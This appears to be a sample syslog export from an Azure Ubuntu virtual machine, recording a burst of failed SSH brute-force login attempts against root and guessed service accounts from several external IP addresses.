+13804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:38,UbuntuDevEnv,2019-06-26 04:47:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:40,UbuntuDevEnv,2019-06-26 04:47:39,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 2879 ssh2,1026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,2879,,
+13806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:45,UbuntuDevEnv,2019-06-26 04:47:42,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 2879 ssh2,1026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,2879,,
+13807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:45,UbuntuDevEnv,2019-06-26 04:47:45,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 2879 ssh2,1026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,2879,,
+13808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:54,UbuntuDevEnv,2019-06-26 04:47:54,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 2879 ssh2],1026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,2879,,
+13809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:54,UbuntuDevEnv,2019-06-26 04:47:54,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 2879 ssh2 [preauth],1026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,2879,,
+13810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:54,UbuntuDevEnv,2019-06-26 04:47:54,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 2879: Too many authentication failures [preauth],1026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,2879,,
+13811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:54,UbuntuDevEnv,2019-06-26 04:47:54,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:54,UbuntuDevEnv,2019-06-26 04:47:54,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,1026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:57,UbuntuDevEnv,2019-06-26 04:47:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:47:59,UbuntuDevEnv,2019-06-26 04:47:59,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 8682 ssh2,1096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,8682,,
+13815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:02,UbuntuDevEnv,2019-06-26 04:48:01,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 8682 ssh2,1096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,8682,,
+13816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:02,UbuntuDevEnv,2019-06-26 04:48:02,auth,UbuntuDevEnv,info,Invalid user ql from 200.6.188.38 port 55637,1116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ql,200.6.188.3,55637,,
+13817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:02,UbuntuDevEnv,2019-06-26 04:48:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,1116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+13818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:02,UbuntuDevEnv,2019-06-26 04:48:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:04,UbuntuDevEnv,2019-06-26 04:48:04,auth,UbuntuDevEnv,info,Failed password for invalid user ql from 200.6.188.38 port 55637 ssh2,1116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ql,200.6.188.3,55637,,
+13820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:05,UbuntuDevEnv,2019-06-26 04:48:04,auth,UbuntuDevEnv,info,Disconnected from invalid user ql 200.6.188.38 port 55637 [preauth],1116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ql,200.6.188.3,55637,,
+13821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:05,UbuntuDevEnv,2019-06-26 04:48:04,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 55637:11: Bye Bye [preauth],1116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,55637,,
+13822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:05,UbuntuDevEnv,2019-06-26 04:48:04,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 8682 ssh2,1096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,8682,,
+13823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:13,UbuntuDevEnv,2019-06-26 04:48:13,auth,UbuntuDevEnv,info,Invalid user typo3 from 196.41.208.238 port 39335,1166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,typo3,196.41.208.2,39335,,
+13824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:13,UbuntuDevEnv,2019-06-26 04:48:10,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 8682 ssh2],1096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,8682,,
+13825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:13,UbuntuDevEnv,2019-06-26 04:48:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,1166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+13826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:13,UbuntuDevEnv,2019-06-26 04:48:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:13,UbuntuDevEnv,2019-06-26 04:48:13,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 8682 ssh2 [preauth],1096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,8682,,
+13828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:13,UbuntuDevEnv,2019-06-26 04:48:13,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 8682: Too many authentication failures [preauth],1096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,8682,,
+13829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:13,UbuntuDevEnv,2019-06-26 04:48:13,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 8682 ssh2,1096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,8682,,
+13830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:13,UbuntuDevEnv,2019-06-26 04:48:13,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:13,UbuntuDevEnv,2019-06-26 04:48:13,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,1096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:15,UbuntuDevEnv,2019-06-26 04:48:15,auth,UbuntuDevEnv,info,Invalid user doku from 119.123.240.8 port 47654,1171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,doku,119.123.240.8,47654,,
+13833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:15,UbuntuDevEnv,2019-06-26 04:48:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:15,UbuntuDevEnv,2019-06-26 04:48:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.123.240.8,1171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,,0,
+13835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:16,UbuntuDevEnv,2019-06-26 04:48:15,auth,UbuntuDevEnv,info,Failed password for invalid user typo3 from 196.41.208.238 port 39335 ssh2,1166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,typo3,196.41.208.2,39335,,
+13836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:16,UbuntuDevEnv,2019-06-26 04:48:15,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 39335:11: Bye Bye [preauth],1166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,39335,,
+13837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:16,UbuntuDevEnv,2019-06-26 04:48:15,auth,UbuntuDevEnv,info,Disconnected from invalid user typo3 196.41.208.238 port 39335 [preauth],1166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,typo3,196.41.208.2,39335,,
+13838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:16,UbuntuDevEnv,2019-06-26 04:48:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:17,UbuntuDevEnv,2019-06-26 04:48:17,auth,UbuntuDevEnv,info,Invalid user prestashop from 177.23.90.10 port 49504,1179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prestashop,177.23.90.1,49504,,
+13840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:17,UbuntuDevEnv,2019-06-26 04:48:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:17,UbuntuDevEnv,2019-06-26 04:48:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,1179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+13842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:17,UbuntuDevEnv,2019-06-26 04:48:17,auth,UbuntuDevEnv,info,Failed password for invalid user doku from 119.123.240.8 port 47654 ssh2,1171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,doku,119.123.240.8,47654,,
+13843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:18,UbuntuDevEnv,2019-06-26 04:48:17,auth,UbuntuDevEnv,info,Received disconnect from 119.123.240.8 port 47654:11: Bye Bye [preauth],1171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.123.240.8,47654,,
+13844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:18,UbuntuDevEnv,2019-06-26 04:48:17,auth,UbuntuDevEnv,info,Disconnected from invalid user doku 119.123.240.8 port 47654 [preauth],1171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,doku,119.123.240.8,47654,,
+13845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:18,UbuntuDevEnv,2019-06-26 04:48:18,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 14500 ssh2,1175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,14500,,
+13846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:20,UbuntuDevEnv,2019-06-26 04:48:19,auth,UbuntuDevEnv,info,Failed password for invalid user prestashop from 177.23.90.10 port 49504 ssh2,1179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prestashop,177.23.90.1,49504,,
+13847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:20,UbuntuDevEnv,2019-06-26 04:48:19,auth,UbuntuDevEnv,info,Disconnected from invalid user prestashop 177.23.90.10 port 49504 [preauth],1179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prestashop,177.23.90.1,49504,,
+13848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:20,UbuntuDevEnv,2019-06-26 04:48:19,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 49504:11: Bye Bye [preauth],1179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,49504,,
+13849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:21,UbuntuDevEnv,2019-06-26 04:48:20,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 14500 ssh2,1175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,14500,,
+13850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:32,UbuntuDevEnv,2019-06-26 04:48:31,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 14500: Too many authentication failures [preauth],1175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,14500,,
+13851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:32,UbuntuDevEnv,2019-06-26 04:48:31,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,1175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:32,UbuntuDevEnv,2019-06-26 04:48:31,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:32,UbuntuDevEnv,2019-06-26 04:48:31,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 14500 ssh2],1175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,14500,,
+13854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:32,UbuntuDevEnv,2019-06-26 04:48:31,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 14500 ssh2 [preauth],1175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,14500,,
+13855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:35,UbuntuDevEnv,2019-06-26 04:48:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:35,UbuntuDevEnv,2019-06-26 04:48:35,auth,UbuntuDevEnv,info,Invalid user jenkins from 5.135.161.72 port 40606,1257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,5.135.161.7,40606,,
+13857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:35,UbuntuDevEnv,2019-06-26 04:48:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:35,UbuntuDevEnv,2019-06-26 04:48:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,1257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+13859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:37,UbuntuDevEnv,2019-06-26 04:48:36,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 20094 ssh2,1246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20094,,
+13860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:38,UbuntuDevEnv,2019-06-26 04:48:37,auth,UbuntuDevEnv,info,Failed password for invalid user jenkins from 5.135.161.72 port 40606 ssh2,1257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,5.135.161.7,40606,,
+13861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:38,UbuntuDevEnv,2019-06-26 04:48:37,auth,UbuntuDevEnv,info,Disconnected from invalid user jenkins 5.135.161.72 port 40606 [preauth],1257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,5.135.161.7,40606,,
+13862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:38,UbuntuDevEnv,2019-06-26 04:48:37,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 40606:11: Bye Bye [preauth],1257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,40606,,
+13863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:39,UbuntuDevEnv,2019-06-26 04:48:38,auth,UbuntuDevEnv,info,Invalid user yarn from 95.216.195.95 port 36118,1273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yarn,95.216.195.9,36118,,
